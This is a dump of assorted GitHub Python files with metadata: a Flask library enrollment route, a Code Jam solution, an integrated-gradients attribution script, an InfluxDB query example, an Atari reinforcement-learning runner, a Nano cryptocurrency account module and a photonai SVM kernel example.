{"api_name": "api.student.create_choice", "line_number": 16, "usage_type": "argument"}]} +{"seq_id": "72239449153", "text": "from flask import render_template, request, redirect, url_for, flash\nfrom app.models import db, Partners, Menu, FastAccess, Contacts, WorkHours, SubMenu, Readers\nfrom app.public_bp.routes.core import normalize_date\nfrom app.public_bp import blueprint\nfrom flask_babel import get_locale, _\nfrom loguru import logger\n\n\n@blueprint.route('/enroll', methods=['GET', 'POST'])\n@logger.catch()\ndef enroll_in_library():\n title = _('Записаться в библиотеку')\n partners = Partners.query.all()\n fast_access = FastAccess.query.order_by(FastAccess.index).all()\n menu = db.session.query(Menu).order_by(Menu.index).all()\n contacts = Contacts.query.first()\n work_hours = WorkHours.query.first()\n\n full_nav = dict()\n for el in menu:\n list_submenu = db.session.query(SubMenu).filter_by(menu_parent_id=el.id).order_by(SubMenu.index).all()\n full_nav[el] = list_submenu\n if request.method == 'POST':\n email = request.form['email']\n name = request.form['name']\n surname = request.form['surname']\n patronymic = request.form['patronymic']\n birth_date = normalize_date(\n request.form['birth_date'])\n reader_category = request.form['category']\n work_place = request.form['work_place']\n group = request.form['group']\n address = request.form['address']\n phone: str = request.form['phone']\n if not phone.isdigit():\n flash('Введит�� телефон числами')\n return redirect(url_for('public.enroll_in_library'))\n if reader_category == 'Обучающийся':\n reader = Readers(email=email, name=name, surname=surname, patronymic=patronymic, birth_date=birth_date,\n category=reader_category, group=group, home_address=address, phone=phone)\n else:\n reader = Readers(email=email, name=name, surname=surname, patronymic=patronymic, birth_date=birth_date,\n category=reader_category, work_place=work_place, group=group,\n home_address=address, phone=phone)\n db.session.add(reader)\n db.session.commit()\n flash('Отправлено')\n return redirect(url_for('public.enroll_in_library'))\n return render_template('public_bp/enroll_in_library.html', title=title, menu=full_nav, partners=partners,\n fast_access=fast_access,\n locale=str(get_locale()), contacts=contacts, work_hours=work_hours)\n", "repo_name": "ganitsa-vadim/library_web_application", "sub_path": "web/app/public_bp/routes/enroll_in_library.py", "file_name": "enroll_in_library.py", "file_ext": "py", "file_size_in_byte": 2541, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask_babel._", "line_number": 12, "usage_type": "call"}, {"api_name": "app.models.Partners.query.all", "line_number": 13, "usage_type": "call"}, {"api_name": "app.models.Partners.query", "line_number": 13, "usage_type": "attribute"}, {"api_name": "app.models.Partners", "line_number": 13, "usage_type": "name"}, {"api_name": "app.models.FastAccess.query.order_by", "line_number": 14, "usage_type": "call"}, {"api_name": "app.models.FastAccess.query", "line_number": 14, "usage_type": "attribute"}, {"api_name": "app.models.FastAccess", "line_number": 14, "usage_type": "name"}, {"api_name": "app.models.FastAccess.index", "line_number": 14, "usage_type": "attribute"}, {"api_name": "app.models.db.session.query", "line_number": 15, "usage_type": "call"}, {"api_name": "app.models.Menu", "line_number": 15, "usage_type": "argument"}, {"api_name": "app.models.db.session", "line_number": 15, "usage_type": "attribute"}, 
{"api_name": "app.models.db", "line_number": 15, "usage_type": "name"}, {"api_name": "app.models.Menu.index", "line_number": 15, "usage_type": "attribute"}, {"api_name": "app.models.Contacts.query.first", "line_number": 16, "usage_type": "call"}, {"api_name": "app.models.Contacts.query", "line_number": 16, "usage_type": "attribute"}, {"api_name": "app.models.Contacts", "line_number": 16, "usage_type": "name"}, {"api_name": "app.models.WorkHours.query.first", "line_number": 17, "usage_type": "call"}, {"api_name": "app.models.WorkHours.query", "line_number": 17, "usage_type": "attribute"}, {"api_name": "app.models.WorkHours", "line_number": 17, "usage_type": "name"}, {"api_name": "app.models.db.session.query", "line_number": 21, "usage_type": "call"}, {"api_name": "app.models.SubMenu", "line_number": 21, "usage_type": "argument"}, {"api_name": "app.models.db.session", "line_number": 21, "usage_type": "attribute"}, {"api_name": "app.models.db", "line_number": 21, "usage_type": "name"}, {"api_name": "app.models.SubMenu.index", "line_number": 21, "usage_type": "attribute"}, {"api_name": "flask.request.method", "line_number": 23, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 23, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 24, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 25, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 25, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 26, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 27, "usage_type": "name"}, {"api_name": "app.public_bp.routes.core.normalize_date", "line_number": 28, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 29, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 30, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 30, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 32, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 32, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 33, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 33, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 34, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 37, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 37, "usage_type": "call"}, {"api_name": "app.models.Readers", "line_number": 39, "usage_type": "call"}, {"api_name": "app.models.Readers", "line_number": 42, "usage_type": "call"}, {"api_name": "app.models.db.session.add", "line_number": 45, "usage_type": "call"}, {"api_name": "app.models.db.session", "line_number": 45, "usage_type": "attribute"}, {"api_name": "app.models.db", "line_number": 45, "usage_type": "name"}, {"api_name": "app.models.db.session.commit", "line_number": 46, 
"usage_type": "call"}, {"api_name": "app.models.db.session", "line_number": 46, "usage_type": "attribute"}, {"api_name": "app.models.db", "line_number": 46, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 47, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 49, "usage_type": "call"}, {"api_name": "flask_babel.get_locale", "line_number": 51, "usage_type": "call"}, {"api_name": "app.public_bp.blueprint.route", "line_number": 9, "usage_type": "call"}, {"api_name": "app.public_bp.blueprint", "line_number": 9, "usage_type": "name"}, {"api_name": "loguru.logger.catch", "line_number": 10, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "23605251991", "text": "#!/usr/bin/python\r\n# 2010 Qualification\r\n''' Usage %s\r\n'''\r\nimport logging\r\n\r\nCurrentDebugLevel=logging.DEBUG\r\n\r\ndef CalculateTotalEarning(earnList, repeatStart, runNum):\r\n total = 0\r\n nonRepeatTotal = 0\r\n repeatTotal = 0\r\n \r\n repeatAt = -1\r\n for i, p in enumerate(earnList):\r\n if p[0] == repeatStart:\r\n repeatAt = i\r\n break\r\n nonRepeatTotal += p[1]\r\n\r\n if repeatAt >= 0: # the rest run will repeat the same sequence from repeatStart\r\n for i in range(repeatAt, len(earnList)):\r\n repeatTotal += earnList[i][1]\r\n total += repeatTotal\r\n if runNum > 0: # if we need more than one repeat those runs in earnList\r\n repeatLen = len(earnList) - repeatAt # there are how many runs in repeat area\r\n if repeatLen > 0:\r\n total += (int(runNum / repeatLen) * repeatTotal)\r\n runNum %= repeatLen\r\n for i in range(repeatAt, repeatAt + runNum):\r\n total += earnList[i][1]\r\n return total + nonRepeatTotal\r\n\r\ndef VerifyCase2(runNum, capacity, groupList):\r\n total = 0\r\n while runNum > 0:\r\n earnSum = 0\r\n isFull = False\r\n for i in range(start, len(groupList)):\r\n if earnSum + groupList[i] <= capacity:\r\n earnSum += groupList[i]\r\n else:\r\n start = i\r\n isFull = True\r\n break\r\n runNum -= 1\r\n\r\ndef VerifyCase(runNum, capacity, groupList):\r\n total = 0\r\n start = 0\r\n isOnceServe = False\r\n isFirst = True\r\n while runNum > 0:\r\n earnSum = 0\r\n isFull = False\r\n for i in range(start, len(groupList)):\r\n if earnSum + groupList[i] <= capacity:\r\n earnSum += groupList[i]\r\n else:\r\n start = i\r\n isFull = True\r\n break\r\n if isFirst:\r\n isFirst = False\r\n if start == 0: # we have very few guests to serve, so we can serve them once for all\r\n isOnceServe = True\r\n break\r\n if not isFull and earnSum < capacity: \r\n start = 0 # start over\r\n for i in range(start, len(groupList)):\r\n if earnSum + groupList[i] <= capacity:\r\n earnSum += groupList[i]\r\n else:\r\n start = i\r\n isFull = True\r\n break\r\n elif not isFull:\r\n start = 0\r\n \r\n total += earnSum\r\n runNum -= 1\r\n \r\n if isOnceServe:\r\n total = sum(groupList) * runNum\r\n\r\n return total\r\n\r\ndef ProcessCase(inFile, caseNum):\r\n logging.debug('Case %d', caseNum)\r\n param = inFile.readline().strip().split()\r\n #logging.debug(param)\r\n groupList = [int(x) for x in inFile.readline().strip().split()]\r\n oldRunNum = runNum = int(param[0])\r\n capacity = int(param[1])\r\n \r\n startSet = set() # where it starts\r\n earnList = [] # start from which and earn how much\r\n \r\n start = 0\r\n isOnceServe = False\r\n isFirst = True\r\n while runNum > 0:\r\n 
startSet.add(start)\r\n earnSum = 0\r\n oldStart = start\r\n isChangedStart = False\r\n for i in range(start, len(groupList)):\r\n if earnSum + groupList[i] <= capacity:\r\n earnSum += groupList[i]\r\n else:\r\n start = i \r\n isChangedStart = True\r\n break\r\n if isFirst:\r\n isFirst = False\r\n if start == 0: # we have very few guests to serve, so we can serve them once for all\r\n isOnceServe = True\r\n break\r\n if not isChangedStart and earnSum < capacity: \r\n start = 0 # start over\r\n for i in range(start, len(groupList)):\r\n if earnSum + groupList[i] <= capacity:\r\n earnSum += groupList[i]\r\n else:\r\n start = i \r\n break\r\n elif not isChangedStart: start = 0 # start over\r\n earnList.append((oldStart, earnSum))\r\n runNum -= 1\r\n if start in startSet: break # we already done this before\r\n if isOnceServe:\r\n total = sum(groupList) * runNum\r\n #total = CalculateTotalEarning([(0, sum(groupList))], 0, runNum)\r\n else:\r\n total = CalculateTotalEarning(earnList, start, runNum)\r\n \r\n# realTotal = VerifyCase(oldRunNum, capacity, groupList)\r\n# if realTotal != total: \r\n# logging.debug(\"Error Case #%d: %d != %d\", caseNum, realTotal, total);\r\n# logging.debug(\"%d %d %d\", oldRunNum, capacity, int(param[2]))\r\n# logging.debug(groupList)\r\n result = [total]\r\n \r\n return result\r\n\r\ndef OutputResult(outFile, caseNum, result):\r\n value = result[0]\r\n outFile.write(\"Case #{0}: {1}\\n\".format(caseNum, value))\r\n logging.debug(\"Case #{0}: {1}\\n\".format(caseNum, value))\r\n\r\ndef ProcessDataFile(fileName):\r\n inFile = open(fileName, 'r')\r\n line = inFile.readline()\r\n lineCount = int(line)\r\n outFile = open(fileName + '.out.txt', 'w')\r\n for i in range(1, lineCount + 1):\r\n result = ProcessCase(inFile, i)\r\n OutputResult(outFile, i, result)\r\n outFile.close()\r\n\r\ndef main():\r\n logging.basicConfig(level=CurrentDebugLevel, datefmt='%Y.%m.%d %H:%M:%S', format='%(asctime)s %(levelname)-5s %(message)s')\r\n question = 'C'\r\n #dataSet = 'small'\r\n dataSet = 'large'\r\n #dataSet = 'test'\r\n #attempt = '-attempt1'\r\n attempt = ''\r\n\r\n ProcessDataFile('{0}-{1}{2}.in'.format(question, dataSet, attempt))\r\n\r\nif __name__ == '__main__': main()", "repo_name": "dr-dos-ok/Code_Jam_Webscraper", "sub_path": "solutions_python/Problem_55/376.py", "file_name": "376.py", "file_ext": "py", "file_size_in_byte": 5624, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.DEBUG", "line_number": 7, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 89, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 149, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 162, "usage_type": "call"}]} +{"seq_id": "41615633073", "text": "import os\nimport argparse\nimport yaml\nimport numpy as np\nfrom tqdm.auto import tqdm, trange\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader, Dataset\nimport torchvision.transforms as transforms\n\nfrom captum.attr import IntegratedGradients\n\nfrom .dataset import CUBADataset\nfrom .loader import load_dataset_and_model\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('dset_name', type=str)\n parser.add_argument('x2y_model_path', type=str, help=\"Should be the checkpoint file.\")\n parser.add_argument('save_path', type=str, help=\"Path to save the attributed numpy file.\")\n parser.add_argument('--x2y_arch_name', type=str, 
default='inception_v3', \n choices=['inception_v3', 'resnet50', 'dup-resnet50', 'vgg11_bn', 'vgg16_bn'])\n parser.add_argument('--split', type=str, default='test', choices=['train', 'val', 'test'])\n parser.add_argument('--data_root_dir', type=str, default='/home/andrewbai/data/')\n # parser.add_argument('--attr_root_dir', type=str, default='/home/andrewbai/attrs/')\n # parser.add_argument('--save_fname_suffix', type=str, default=None)\n \n parser.add_argument('--bsize', type=int, default=32,\n help=\"Does not affect result. Only affects speed. Reduce when OOM.\")\n parser.add_argument('--x2y_cfg_path', type=str, default=None)\n return parser.parse_args()\n\ndef main():\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n args = parse_arguments()\n \n x2y_model_kwargs = {}\n if args.x2y_cfg_path is not None:\n with open(args.x2y_cfg_path, 'r') as f:\n x2y_model_kwargs = yaml.safe_load(f)\n \n x2y_dl_train, x2y_dl_valid, x2y_dl_test, x2y_model = load_dataset_and_model(\n dset_name=args.dset_name, task='x2y', data_root_dir=args.data_root_dir, \n use_all_data=False, arch_name=args.x2y_arch_name, bsize=args.bsize, model_kwargs=x2y_model_kwargs)\n x2y_model.load_state_dict(torch.load(args.x2y_model_path))\n x2y_model = x2y_model.to(device).eval()\n\n ig = IntegratedGradients(x2y_model, multiply_by_inputs=False)\n attrs = []\n \n if args.split == 'val':\n dl = x2y_dl_valid\n elif args.split == 'test':\n dl = x2y_dl_test\n else:\n raise ValueError\n\n for x, y in tqdm(dl, leave=True):\n x = x.to(device)\n x.requires_grad = True\n y = y.to(device)\n\n attr = ig.attribute(x, baselines=None, target=y)\n attr = attr.detach().cpu().numpy()\n attrs.append(attr)\n\n attrs = np.concatenate(attrs, axis=0)\n np.save(args.save_path, attrs)\n\nif __name__ == '__main__':\n main()\n", "repo_name": "jybai/concept-gradients", "sub_path": "src/cg/attribute_ig.py", "file_name": "attribute_ig.py", "file_ext": "py", "file_size_in_byte": 2674, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 35, "usage_type": "attribute"}, {"api_name": "yaml.safe_load", "line_number": 41, "usage_type": "call"}, {"api_name": "loader.load_dataset_and_model", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 46, "usage_type": "call"}, {"api_name": "captum.attr.IntegratedGradients", "line_number": 49, "usage_type": "call"}, {"api_name": "tqdm.auto.tqdm", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 69, "usage_type": "call"}]} +{"seq_id": "17852054846", "text": "import influxdb_client\nfrom influxdb_client.client.write_api import SYNCHRONOUS\n\nbucket = \"my-bucket\"\norg = \"my-org\"\ntoken = \"kiuEBYPAHnXdQDEdDoK3lUbZD3PLycFY4-QncqfFQKukiU2P0sNAZVKVYzBXTW8jWs7MK-gNyijcFDwDu5zmjw==\"\n# Store the URL of your InfluxDB instance\nurl=\"http://localhost:8086\"\n\n#Setup database\nclient = influxdb_client.InfluxDBClient(\n url=url,\n token=token,\n org=org\n)\n\nquery_api = client.query_api()\n\nquery = 'from(bucket:\"my-bucket\")\\\n|> range(start: -10m)\\\n|> filter(fn:(r) => r._measurement == \"my_measurement\")\\\n|> filter(fn: 
(r) => r.location == \"Prague\")\\\n|> filter(fn:(r) => r._field == \"temperature\" )'\n\nresult = query_api.query(org=org, query=query)\n\nresults = []\nfor table in result:\n for record in table.records:\n results.append((record.get_field(), record.get_value()))\n\nprint(results)", "repo_name": "EricvanLessen/mean-edge-detection-app", "sub_path": "influxdb2-python/02-query-data-from-influxdb.py", "file_name": "02-query-data-from-influxdb.py", "file_ext": "py", "file_size_in_byte": 818, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "influxdb_client.InfluxDBClient", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "27611436716", "text": "\"\"\"\nScript to run experiments. See configs.py for command line argument parser. Usage:\npython3 run_atari.py --game Breakout\nwill run the Successor Uncertainties model on Breakout with the parameters used in the paper.\nOnce run has finished, see run_test.py to obtain a test score.\n\"\"\"\n\nimport logging\nimport time\n\nfrom torch.nn.utils import clip_grad_norm_\nfrom torch.optim import Adam\n\nimport configs\nfrom models.policies import UniformPolicy\nfrom replay_buffer import ReplayBuffer\n\n\ndef play_episode(n_steps, manager, env, model, policy, replay_buffer, optim, config):\n ep_start_steps, t0 = n_steps, time.time()\n state, ep_reward, terminal = env.reset(), 0, False\n\n policy.start_new_episode()\n\n while not terminal:\n action = policy(state.torch().cuda())\n\n next_state, reward, terminal, info = env.step(action)\n\n replay_buffer.add(state, action, reward, next_state, terminal)\n policy.update(state, action, reward)\n state = next_state\n\n ep_reward += reward\n n_steps += 1\n\n if optim and n_steps % config.train_interval == 0:\n optim.zero_grad()\n\n if n_steps % config.update_interval == 0:\n model.update_params()\n\n model.loss(replay_buffer.sample()).backward()\n clip_grad_norm_(model.parameters(), config.grad_clip_norm)\n optim.step()\n\n manager.record_losses(n_steps, model.named_loss_dict)\n\n fps = (n_steps - ep_start_steps) / (time.time() - t0)\n manager.record_policy(n_steps, policy)\n manager.record_episode(n_steps, info, ep_reward, fps=fps)\n return n_steps\n\n\ndef run_atari_experiment(args, verbose=True, log_dir='logs'):\n config = configs.AtariArgParse().parse_args(args)\n manager, env, model, policy = configs.construct_rl_modules(config, log_dir)\n\n if not verbose:\n logging.getLogger().setLevel('ERROR')\n replay_buffer = ReplayBuffer(config.buffer_size, config.batch_size)\n\n n_steps = 0\n while n_steps < config.learning_start_step:\n n_steps = play_episode(n_steps, manager, env, model, UniformPolicy(policy.action_size),\n replay_buffer, None, config)\n\n optim = Adam(model.parameters(), lr=config.lr)\n manager.training_started = True\n\n while n_steps < config.total_num_steps:\n n_steps = play_episode(n_steps, manager, env, model, policy, replay_buffer, optim, config)\n\n return manager.end_report()\n\n\nif __name__ == '__main__':\n run_atari_experiment(args=None)\n", "repo_name": "DavidJanz/successor_uncertainties_atari", "sub_path": "run_atari.py", "file_name": "run_atari.py", "file_ext": "py", "file_size_in_byte": 2508, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 19, "dataset": "github-code", "pt": "61", "api": [{"api_name": "time.time", "line_number": 20, "usage_type": "call"}, {"api_name": "replay_buffer.add", "line_number": 30, "usage_type": "call"}, {"api_name": "replay_buffer.sample", 
"line_number": 43, "usage_type": "call"}, {"api_name": "torch.nn.utils.clip_grad_norm_", "line_number": 44, "usage_type": "call"}, {"api_name": "time.time", "line_number": 49, "usage_type": "call"}, {"api_name": "configs.AtariArgParse", "line_number": 56, "usage_type": "call"}, {"api_name": "configs.construct_rl_modules", "line_number": 57, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 60, "usage_type": "call"}, {"api_name": "replay_buffer.ReplayBuffer", "line_number": 61, "usage_type": "call"}, {"api_name": "models.policies.UniformPolicy", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 68, "usage_type": "call"}]} +{"seq_id": "11118454917", "text": "#!/usr/bin/env python3\n\n\nfrom pyblake2 import blake2b\nfrom bitstring import BitArray\n\nfrom .pure25519 import ed25519_oop as ed25519\nfrom .zbase32 import decode as b32_decode\nfrom .zbase32 import encode as b32_encode\nfrom .types_convert import to_bytes\n\n\nGENESIS_ADDRESS = 'xrb_3t6k35gi95xu6tergt6p69ck76ogmitsa8mnijtpxm9fkcm736xtoncuohr3'\nGENESIS_VERIFYING_KEY = bytes.fromhex('E89208DD038FBB269987689621D52292AE9C35941A7484756ECCED92A65093BA')\n\n\nclass Account(object):\n\n def __init__(self, signing_key=None, verifying_key=None, address=None):\n \"\"\"\n Create an account with signing_key that can sign/verify, or only verifying_key/address that can verify.\n No seed involved, so one Account can hold only one signing key.\n \"\"\"\n self.signing_key = signing_key\n self.verifying_key = verifying_key\n self.address = address\n\n self._signing_key_bytes = None\n self._verifying_key_bytes = None\n\n self._is_genesis = False\n\n self._prepare_account()\n\n def __str__(self):\n \"\"\"\n Reture a readable address.\n \"\"\"\n return self.xrb_address\n\n @property\n def address_valid(self):\n return address_valid(self.address)\n\n @property\n def xrb_address(self):\n return verifying_key_to_address(self._verifying_key_bytes)\n\n def _to_signing_key(self, data):\n \"\"\"\n Convert data to signing key if legal, return bytes.\n \"\"\"\n\n return to_bytes(data, 32)\n\n def _to_verifying_key(self, data):\n \"\"\"\n Convert data to verifying key if legal, return bytes.\n \"\"\"\n\n vk = to_bytes(data, 32)\n if not vk and isinstance(data, str) and address_valid(data):\n vk = address_to_verifying_key(data)\n return vk\n\n def _prepare_account(self):\n \"\"\"\n If signing_key is given, generate verifying_key/address from signing_key.\n If not, generate address/verifying_key from each other.\n \"\"\"\n\n if not self.signing_key and not self.verifying_key and not self.address:\n raise Exception('signing_key/verifying_key/address, must give at least one')\n\n signing_key_bytes = self._to_signing_key(self.signing_key)\n verifying_key_bytes = self._to_verifying_key(self.verifying_key)\n address_bytes = self._to_verifying_key(self.address)\n\n if signing_key_bytes:\n _verifying_key_bytes = signing_to_verifying_key(signing_key_bytes)\n\n # Guard against signing_key/verifying_key/address mismatch.\n if verifying_key_bytes and _verifying_key_bytes != verifying_key_bytes:\n raise Exception('signing_key and verifying_key not match')\n if address_bytes and _verifying_key_bytes != address_bytes:\n raise Exception('signing_key and address not match')\n\n self._signing_key_bytes = signing_key_bytes\n self._verifying_key_bytes = _verifying_key_bytes\n\n else:\n\n if verifying_key_bytes:\n if address_bytes and verifying_key_bytes != address_bytes:\n raise Exception('verifying_key and address not 
match')\n self._verifying_key_bytes = verifying_key_bytes\n\n elif address_bytes:\n if verifying_key_bytes and verifying_key_bytes != address_bytes:\n raise Exception('verifying_key and address not match')\n self._verifying_key_bytes = address_bytes\n\n if self._verifying_key_bytes == GENESIS_VERIFYING_KEY:\n self._is_genesis = True\n\n def sign_block(self, block_hash):\n \"\"\"\n Return the signature of a hash.\n \"\"\"\n\n if not self._signing_key_bytes:\n raise Exception('can not sign block since signing_key is not given')\n\n hash_bytes = to_bytes(block_hash, 32, strict=True)\n\n sk_obj = ed25519.SigningKey(self._signing_key_bytes)\n return sk_obj.sign(hash_bytes)\n\n def signature_valid(self, block_hash, signature):\n \"\"\"\n Use verifying key to verify block hash and the signature, return True or False\n \"\"\"\n\n if not self._verifying_key_bytes:\n raise Exception('can not verify block since verifying_key or address is not given')\n\n hash_bytes = to_bytes(block_hash, 32, strict=True)\n signature_bytes = to_bytes(signature, 64, strict=True)\n\n vk_obj = ed25519.VerifyingKey(self._verifying_key_bytes)\n try:\n vk_obj.verify(signature_bytes, hash_bytes)\n return True\n except:\n return False\n\n\ndef seed_to_signing_key(seed, index=0):\n \"\"\"\n from raiblocks seed to private key (ed25519 seed)\n\n :param str seed: the hex string of raiblocks seed, 64 characters long\n :param int index: the index of wallet address\n\n :rtype: bytes\n :return: signing key\n\n Code Example::\n\n seed = 'CCC020CAF01C98B6B076A9F00573503E0D7FBA85BC7CA21AF3B3C02A2DDF5326'\n sk = seed_to_signing_key(seed, 1)\n print(sk.hex())\n\n \"\"\"\n\n h = blake2b(digest_size=32)\n\n seed_bytes = bytes.fromhex(seed)\n h.update(seed_bytes)\n\n index_bits = BitArray(uint=index, length=32)\n index_bytes = index_bits.tobytes()\n\n h.update(index_bytes)\n\n return h.digest()\n\n\ndef signing_to_verifying_key(sk):\n \"\"\"\n ed25519 signing key to verifying key\n\n :param bytes sk: signing key\n\n :rtype: bytes\n :return: verifying key\n\n \"\"\"\n\n sk_obj = ed25519.SigningKey(sk)\n vk_obj = sk_obj.get_verifying_key()\n return vk_obj.to_bytes()\n\n\ndef verifying_key_to_address(vk):\n \"\"\"\n ed25519 verifying key to raiblocks address\n\n :param bytes vk: verifying key\n\n :rtype: str\n :return: raiblocks address\n\n \"\"\"\n\n addr_b32 = b32_encode(vk)\n\n addr_checksum = bytearray(blake2b(vk, digest_size=5).digest())\n addr_checksum.reverse()\n checksum_b32 = b32_encode(addr_checksum)\n\n address = 'xrb_' + addr_b32 + checksum_b32\n return address\n\n\ndef address_to_verifying_key(address):\n \"\"\"\n raiblocks address to ed25519 verifying key\n\n :param str address: raiblocks address\n\n :rtype: bytes\n :return: ed25519 verifying key\n\n \"\"\"\n\n addr_b32 = address[4:56]\n vk = b32_decode(addr_b32)\n return vk\n\n\ndef address_valid(address):\n vk = address_to_verifying_key(address)\n new_addr = verifying_key_to_address(vk)\n\n if address == new_addr:\n return True\n else:\n return False\n\n", "repo_name": "goophile/pico", "sub_path": "pico/libs/account.py", "file_name": "account.py", "file_ext": "py", "file_size_in_byte": 6459, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "types_convert.to_bytes", "line_number": 54, "usage_type": "call"}, {"api_name": "types_convert.to_bytes", "line_number": 61, "usage_type": "call"}, {"api_name": "types_convert.to_bytes", "line_number": 114, "usage_type": "call"}, {"api_name": 
"pure25519.ed25519_oop.SigningKey", "line_number": 116, "usage_type": "call"}, {"api_name": "pure25519.ed25519_oop", "line_number": 116, "usage_type": "name"}, {"api_name": "types_convert.to_bytes", "line_number": 127, "usage_type": "call"}, {"api_name": "types_convert.to_bytes", "line_number": 128, "usage_type": "call"}, {"api_name": "pure25519.ed25519_oop.VerifyingKey", "line_number": 130, "usage_type": "call"}, {"api_name": "pure25519.ed25519_oop", "line_number": 130, "usage_type": "name"}, {"api_name": "pyblake2.blake2b", "line_number": 156, "usage_type": "call"}, {"api_name": "bitstring.BitArray", "line_number": 161, "usage_type": "call"}, {"api_name": "pure25519.ed25519_oop.SigningKey", "line_number": 180, "usage_type": "call"}, {"api_name": "pure25519.ed25519_oop", "line_number": 180, "usage_type": "name"}, {"api_name": "zbase32.encode", "line_number": 196, "usage_type": "call"}, {"api_name": "pyblake2.blake2b", "line_number": 198, "usage_type": "call"}, {"api_name": "zbase32.encode", "line_number": 200, "usage_type": "call"}, {"api_name": "zbase32.decode", "line_number": 218, "usage_type": "call"}]} +{"seq_id": "39474670143", "text": "import os\n\nfrom sklearn.datasets import make_classification\nfrom sklearn.model_selection import ShuffleSplit\nfrom sklearn.metrics.pairwise import rbf_kernel\nfrom joblib import Memory\n\nfrom photonai import Hyperpipe, PipelineElement, FloatRange\n\n\ncache_dir = './tmp/kernel_cache'\nos.makedirs(cache_dir, exist_ok=True)\nmemory = Memory(cachedir=cache_dir, verbose=0)\n\n\n@memory.cache\ndef cached_rbf(X, Y):\n return rbf_kernel(X, Y)\n\n\n# create toy data\nn_features = 10000\nn_samples = 1000\nn_informative = 10\nX, y = make_classification(n_samples, n_features, n_informative=n_informative)\ngamma = 1 / n_features\n\n\"\"\"\nEspecially with large datasets, it is unnecessary to recompute the kernel for every hyperparameter configuration.\nFor that reason, you can pass a cached kernel function that will only recompute the kernel if the input data changes.\nIf you don't want to cache the kernel, it still decreases the computation time by magnitudes when passing the kernel\nas dedicated function. 
See this issue for details: \nhttps://github.com/scikit-learn/scikit-learn/issues/21410\nhttps://stackoverflow.com/questions/69680420/using-a-custom-rbf-kernel-function-for-sklearns-svc-is-way-faster-than-built-in\n\"\"\"\n#kernel = 'kernel'\n#kernel = rbf_kernel\nkernel = cached_rbf\n\npipe = Hyperpipe('svm_with_custom_kernel',\n inner_cv=ShuffleSplit(n_splits=1, test_size=0.2),\n outer_cv=ShuffleSplit(n_splits=1, test_size=0.2),\n optimizer='sk_opt',\n optimizer_params={'n_configurations': 15},\n metrics=['accuracy', 'precision', 'recall', 'balanced_accuracy'],\n best_config_metric='accuracy',\n project_folder='./tmp',\n verbosity=1)\n\npipe += PipelineElement('StandardScaler')\n\npipe += PipelineElement('SVC',\n hyperparameters={'C': FloatRange(1e-6, 1e6)},\n gamma=gamma, kernel=kernel)\n\npipe.fit(X, y)\n\n", "repo_name": "wwu-mmll/photonai", "sub_path": "examples/advanced/svc_kernel_speed_up.py", "file_name": "svc_kernel_speed_up.py", "file_ext": "py", "file_size_in_byte": 1952, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 70, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.makedirs", "line_number": 12, "usage_type": "call"}, {"api_name": "joblib.Memory", "line_number": 13, "usage_type": "call"}, {"api_name": "sklearn.metrics.pairwise.rbf_kernel", "line_number": 18, "usage_type": "call"}, {"api_name": "sklearn.datasets.make_classification", "line_number": 25, "usage_type": "call"}, {"api_name": "photonai.Hyperpipe", "line_number": 40, "usage_type": "call"}, {"api_name": 